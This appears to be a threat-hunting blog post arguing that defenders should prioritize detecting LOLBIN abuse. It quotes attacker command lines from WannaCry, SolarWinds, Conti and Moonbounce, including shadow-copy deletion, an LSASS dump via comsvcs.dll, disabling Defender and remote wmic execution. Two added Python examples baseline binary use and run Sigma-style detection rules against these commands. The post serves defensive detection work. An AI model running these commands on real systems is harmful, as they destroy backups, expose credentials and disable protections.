Why Hunting For LOLBINs Is One Of The Best Bets
Introduction
While working on “Malicious Command-Line” (MAL-CL), documenting and researching the many ways different tools can be (ab)used via the command line, I noticed a trend that in hindsight seems “obviously obvious” but is, I believe, worth stating nonetheless.
You don’t drop things just because they’re old and dusty, you drop them only when they stop working
And by things that “work” I mean of course our beloved LOLBINs.
LOLBINs are in some way like shiny Pokémon, in the sense that once you catch one you need to brag about it by using it all the time.
Now, we might talk about the latest C2 framework and how it offers command-line obfuscation, parent/child process spoofing, EDR unhooking, direct syscall invocation, and other shenanigans I’m not even aware of. While there is a grain of truth in those statements, and attackers are certainly using these “advanced” techniques, the fact of the matter is that attacks happen in a chain, and more often than not LOLBINs are a big part of that chain.
Note: This blog post is in no way saying you should stop hunting for other things, or that you should hunt for X or Y. I’m simply pointing out a statistical observation which suggests that “simple != bad”.
What Do the Numbers Say?
Threat reports are a good reference to see attacker tradecraft in the wild, so let’s take a look at a couple of them.
A great report to look at first is “Red Canary’s Threat Detection Report”. You should definitely check the whole report, as it’s an amazing read. I’m going to simplify some things to fit the context of this blog.
If we take the top four techniques from this top 10 and check the most prevalent sub-techniques in each category, we get the following:
- T1059.001 — PowerShell
- T1059.003 — Windows Command Shell
- T1218.011 — Rundll32
- T1218.005 — Mshta
- T1543.003 — Windows Service
- T1053.005 — Scheduled Task
Most of these sub-techniques were achieved via pre-installed binaries such as “schtasks”, “sc”, “powershell.exe”, “cmd.exe”, “rundll32”, “mshta”, etc.
This is not to say that other techniques or tools were not used, but as I’ve been stating from the start, there are always LOLBINs at play.
Another interesting result comes from the Kaspersky MDR team, who released a blog post titled “Cybercriminals’ top LOLBins”, where two of the most used LOLBINs were “PowerShell” (used in 1 in 5 “Critical Incidents”) and “rundll32”.
Expel has also shared their annual report, titled “Great eXpeltations 2022”, with data from their SOC; it’s a fantastic read. The one thing to grab from their report that fits our context here is the highlighted “Top Windows processes to monitor”, most of which are “conveniently” LOLBINs:
- PowerShell
- CMD shell
- Wscript.exe
- RegSvr32.exe
- W3wp.exe
Even the term “lolbins” is still seeing a jump in search trends every year, and even if nothing else did, this signifies something… I hope.
I could highlight this point even further with more examples from different threat reports, but I think looking at real and “infamous” case studies will make the point even clearer.
Case Studies
Below are simply some of the tools and command lines seen in these “infamous” attacks.
Wannacry (2017)
Source: WannaCry Malware Profile
```
icacls . /grant Everyone:F /T /C /Q
attrib +h +s <Drive_Letter>:\$RECYCLE
taskkill.exe /f /im sqlserver.exe
taskkill.exe /f /im sqlwriter.exe
taskkill.exe /f /im mysqld.exe
cmd.exe /c start /b @WanaDecryptor@.exe vs
vssadmin delete shadows /all /quiet
wmic shadowcopy delete
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -q
cscript.exe //nologo <1 character>.vbs
```
Solarwinds (2020)
Source: Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop
```
wmic /node:[target] process call create "rundll32 c:\windows\[folder]\[beacon].dll [export]"
Invoke-WMIMethod win32_process -name create -argumentlist 'rundll32 c:\Windows\[folder]\[beacon].dll [export]' -ComputerName [target]
rundll32.exe c:\windows\[folder]\[beacon].dll [export]
netsh advfirewall firewall add rule name="[rulename1]" protocol=UDP dir=out localport=137 action=block
schtasks /query /v /s [target] /fo csv
sc \\[target] query type=service state=all
wmic /node:"[target]" service get name,startname
reg add HKLM\system\currentcontrolset\services\[service name] /v Start /t REG_DWORD /d 4
```
Conti Leak (2021)
Source: Conti Manual Leak
```
whoami /groups
net localgroup administrators
nltest /dclist:[domain]
rundll32.exe C:\windows\System32\comsvcs.dll,MiniDump PID C:\ProgramData\lsass.dmp full
wmic /node: {1} process call create "rundll32.exe C:\ProgramData\2.dll StartW"
wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd / c vssadmin list shadows >> c: \log.txt"
powershell Set-MpPreference -DisableRealtimeMonitoring $true
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 / f
```
Moonbounce (2022)
```
net start "iscsiwmi"
sc stop iscsiwmi
sc delete iscsiwmi
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "iscsiwmi" /t REG_MULTI_SZ /d "iscsiwmi" /f
sc create "iscsiwmi" binPath= "$system32\svchost.exe -k iscsiwmi" type= share start= auto error= ignore DisplayName= "iscsiwmi"
SC failure "iscsiwmi" reset= 86400 actions= restart/60000/restart/60000/restart/60000
sc description "iscsiwmi" ""iSCSI WMI Classes That Manage Initiators, Ports, Sessions and Connections""
reg add "HKLM\SYSTEM\CurrentControlSet\Services\iscsiwmi\Parameters" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\iscsiwmi\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "$windir\Microsoft.NET\Framework64\v4.0.30319\System.Mail.Service.dll" /f
net start "iscsiwmi"
```
No matter the sophistication of the attacker, whether it be a supply chain compromise or a UEFI implant, at some point in the attack chain LOLBINs “will” be used.
Hunting & Detecting LOLBINs Usage
Whilst the experience of detecting LOLBINs could and will be different from one company to another (after all, these are system binaries or admin utilities getting abused), there are common guidelines that can help.
Keeping Up With The Trends
“You can’t defend what you don’t know” — this means that if you’re not aware that “certutil” can be abused as a downloader, you can’t detect its usage.
Now, if you’re one of those who say “No… don’t focus on the tool, focus on the behaviour”, know that this article is not aimed at you, as you’re already ahead of most. So let’s keep it simple for the sake of the blog.
Fortunately, there are a couple of ways to keep up with the latest LOLBINs in town:
- LOLBAS-Project
- Infosec Twitter and hashtags such as #lolbin
- Projects like MAL-CL that keep track of how command-line utilities can be “abused”
Baseline and AppControl
If you’re already aware of what’s out there and are wondering how to detect it: stop, and try to block it first instead.
Using something like WDAC from Microsoft or Symantec’s Adaptive Protection will help you baseline and block the stuff you don’t use. See the link below as an example.
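The “baseline, then block what you don’t use” idea above, worked through as an added example (not code from the original post, and unrelated to how WDAC or Adaptive Protection build their policies): process-creation records from a quiet baseline window produce a per-host allowlist; watchlisted LOLBINs that no host ever ran are the cheapest block candidates, and later executions of a watchlisted binary on a host that never used it are flagged for review. The hosts, paths, watchlist and events are all constructed sample data.

```python
"""
Added example (not from the original post): per-host baselining of binary usage
as a first step before an application-control block list. Hosts, paths, the
LOLBIN watchlist and all events below are constructed sample data.
"""
from collections import defaultdict

# Hypothetical watchlist of LOLBIN image names we care about (lower-case)
LOLBIN_WATCHLIST = {"certutil.exe", "mshta.exe", "rundll32.exe", "wmic.exe",
                    "cscript.exe", "regsvr32.exe", "bitsadmin.exe"}

# Constructed process-creation records from a quiet baseline window
BASELINE_EVENTS = [
    {"Host": "WS01", "Image": "C:\\Windows\\explorer.exe", "CommandLine": "explorer.exe"},
    {"Host": "WS01", "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"Host": "WS02", "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"Host": "WS02", "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": "wmic os get caption"},          # WS02 is an admin workstation
    {"Host": "WS02", "Image": "C:\\Windows\\System32\\cscript.exe",
     "CommandLine": "cscript.exe //nologo inventory.vbs"},
]

# Constructed records observed after the baseline window closed
NEW_EVENTS = [
    {"Host": "WS01", "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": "wmic shadowcopy delete"},
    {"Host": "WS01", "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe C:\\windows\\System32\\comsvcs.dll,MiniDump 624 C:\\ProgramData\\lsass.dmp full"},
    {"Host": "WS02", "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": "wmic /node:\"DC01\" process call create \"rundll32.exe C:\\ProgramData\\2.dll StartW\""},
    {"Host": "WS01", "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta.exe C:\\Users\\Public\\constructed.hta"},
]


def image_name(path: str) -> str:
    """Strip the directory and lower-case the file name, e.g. WMIC.exe -> wmic.exe."""
    return path.rsplit("\\", 1)[-1].lower()


def build_baseline(events):
    """Map host -> set of image names that host executed during the baseline window."""
    baseline = defaultdict(set)
    for ev in events:
        baseline[ev["Host"]].add(image_name(ev["Image"]))
    return baseline


def block_candidates(baseline, watchlist=LOLBIN_WATCHLIST):
    """Watchlisted binaries that no baselined host ever ran: the cheapest ones to block first."""
    used = set().union(*baseline.values()) if baseline else set()
    return sorted(watchlist - used)


def outside_baseline(baseline, events, watchlist=LOLBIN_WATCHLIST):
    """Post-baseline executions of a watchlisted binary on a host that never used it."""
    return [(ev["Host"], image_name(ev["Image"]), ev["CommandLine"])
            for ev in events
            if image_name(ev["Image"]) in watchlist
            and image_name(ev["Image"]) not in baseline.get(ev["Host"], set())]


if __name__ == "__main__":
    base = build_baseline(BASELINE_EVENTS)
    print("Block candidates:", block_candidates(base))
    for host, image, cmd in outside_baseline(base, NEW_EVENTS):
        print(f"[{host}] {image} not in baseline: {cmd}")
```

Note what the baseline does not catch: the comsvcs.dll MiniDump on WS01 and the remote `wmic /node:` process creation on WS02 both use a binary those hosts legitimately ran during the baseline window, so they pass silently. Baselining tells you what you can block outright; the binaries you must keep are the ones that need command-line logging and detection content.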
Log, Collect and Detect
There are some LOLBINs that you can’t do a lot about, and in those cases detection comes to the rescue. Having command-line logging and Sysmon logging enabled is very helpful for finding this kind of activity.
SIGMA is a great resource, along with others, for finding detections for these LOLBINs.
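To show what “command-line logging plus detection content” looks like in practice, here is an added example that is not from the original post and not from the Sigma project: a minimal Sigma-style matcher (image suffix plus a `contains|all` list over CommandLine) run over constructed process-creation records shaped like Sysmon Event ID 1 / Security 4688 fields. The rules are hypothetical and are modelled on the command lines quoted in the case studies above; the events, including the benign ones that must not fire, are constructed.

```python
"""
Added example (not from the original post or the Sigma project): a small
Sigma-style matcher for process-creation logs. Rules are hypothetical, modelled
on the case-study command lines; sample events are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    title: str
    image_ends_with: tuple   # any of these image suffixes must match (case-insensitive)
    cmdline_all: tuple       # every substring must appear in CommandLine (contains|all)


RULES = (
    Rule("Shadow copy deletion via vssadmin/wmic",
         ("\\vssadmin.exe", "\\wmic.exe"), ("shadow", "delete")),
    Rule("LSASS dump via comsvcs.dll MiniDump",
         ("\\rundll32.exe",), ("comsvcs.dll", "minidump")),
    Rule("Defender real-time monitoring disabled",
         ("\\powershell.exe", "\\pwsh.exe"), ("set-mppreference", "disablerealtimemonitoring")),
    Rule("Service start type set to disabled via reg add",
         ("\\reg.exe",), ("\\services\\", "/v start", "/d 4")),
    Rule("Remote process creation via wmic",
         ("\\wmic.exe",), ("/node:", "process call create")),
)

# Constructed process-creation records (Sysmon EID 1 / 4688 style fields)
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\vssadmin.exe",
     "CommandLine": "vssadmin delete shadows /all /quiet"},
    {"Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": "wmic shadowcopy delete"},
    {"Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe C:\\windows\\System32\\comsvcs.dll,MiniDump 624 C:\\ProgramData\\lsass.dmp full"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg add HKLM\\system\\currentcontrolset\\services\\SvcName /v Start /t REG_DWORD /d 4"},
    {"Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": "wmic /node:\"DC01\" process call create \"rundll32.exe C:\\ProgramData\\2.dll StartW\""},
    # Benign administrative noise that must not fire
    {"Image": "C:\\Windows\\System32\\vssadmin.exe",
     "CommandLine": "vssadmin list shadows"},
    {"Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\" /v ProductName"},
]


def _normalize(s: str) -> str:
    # Collapse whitespace and lower-case so "cmd / c" and "CMD /C" compare alike
    return re.sub(r"\s+", " ", s).strip().lower()


def match_rule(rule: Rule, event: dict) -> bool:
    """True when the image suffix matches and every cmdline token is present."""
    image = _normalize(event.get("Image", ""))
    cmd = _normalize(event.get("CommandLine", ""))
    if not any(image.endswith(suffix.lower()) for suffix in rule.image_ends_with):
        return False
    return all(token.lower() in cmd for token in rule.cmdline_all)


def detect(events) -> list:
    """Return (rule title, CommandLine) for every rule each event matches."""
    hits = []
    for ev in events:
        for rule in RULES:
            if match_rule(rule, ev):
                hits.append((rule.title, ev["CommandLine"]))
    return hits


if __name__ == "__main__":
    for title, cmd in detect(SAMPLE_EVENTS):
        print(f"[{title}] {cmd}")
```

The image suffix check is what keeps these rules from becoming pure string greps: `"shadow"` and `"delete"` in a PowerShell script block are a different signal from the same tokens on a `vssadmin.exe` command line. Whitespace normalisation matters too, since the Conti manual’s `cmd / c` spacing would otherwise dodge a naive `/c` match.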
Conclusion
In conclusion, the idea of focusing on LOLBINs might be a controversial one to some. But as I stated multiple times, this blog is here to highlight the importance of LOLBINs in attackers’ tradecraft and why it shouldn’t be ignored.
As always, following a structure like the Pyramid of Pain in your hunting logic, priority and coverage is a great choice, but if you don’t have the necessary resources and you’re hesitating between behaviour and LOLBINs, I say go for LOLBINs first.
I hope you found the information here useful and helpful. If you want to discuss this or anything infosec-related, you can find me on Twitter @nas_bench.